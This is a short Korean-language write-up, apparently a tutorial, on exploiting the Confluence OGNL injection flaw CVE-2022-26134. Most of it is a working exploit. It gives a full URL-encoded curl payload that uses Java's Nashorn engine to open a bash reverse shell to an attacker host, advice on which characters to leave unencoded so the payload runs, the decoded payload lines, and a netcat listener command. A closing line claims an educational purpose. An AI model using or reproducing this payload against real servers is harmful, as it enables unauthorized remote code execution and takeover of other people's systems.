
Atlassian의 Questions for Confluence 앱 CVE-2022-26134의 적극적 악용
CVE-2022-26134는 Atlassian Confluence에 영향을 미치는 치명적인 원격 코드 실행(RCE) 취약점입니다. 이 취약점은 인증되지 않은 공격자가 취약한 엔드포인트에 OGNL 표현식을 주입하여 임의 코드를 실행할 수 있게 합니다.
다음 CURL 명령은 Java의 Nashorn 엔진을 활용하여 리버스 셸을 실행하는 이 취약점의 능동적 악용을 보여줍니다:
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/
이러한 수정을 수행하는 동안 URL 인코딩도 고려해야 합니다. 개념 증명(PoC)의 페이로드 문자열은 완전히 URL 인코딩되어 있지 않습니다. 특정 문자(특히 ".", "-" 및 "/")는 인코딩되지 않습니다. 항상 그런 것은 아니지만, 이 악용의 경우 페이로드 작동에 중요합니다. 이러한 문자가 인코딩되면 서버가 URL을 다르게 구문 분석하여 페이로드가 실행되지 않을 수 있습니다. 즉, 페이로드를 수정한 후 전체에 URL 인코딩을 적용할 수 없습니다.
${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
nc -lvnp 1270
이 문서는 교육 목적으로만 제공됩니다. 승인되지 않은 시스템 악용은 불법이며 심각한 결과를 초래할 수 있습니다. 보안 평가를 수행하기 전에 항상 적절한 승인을 받으십시오.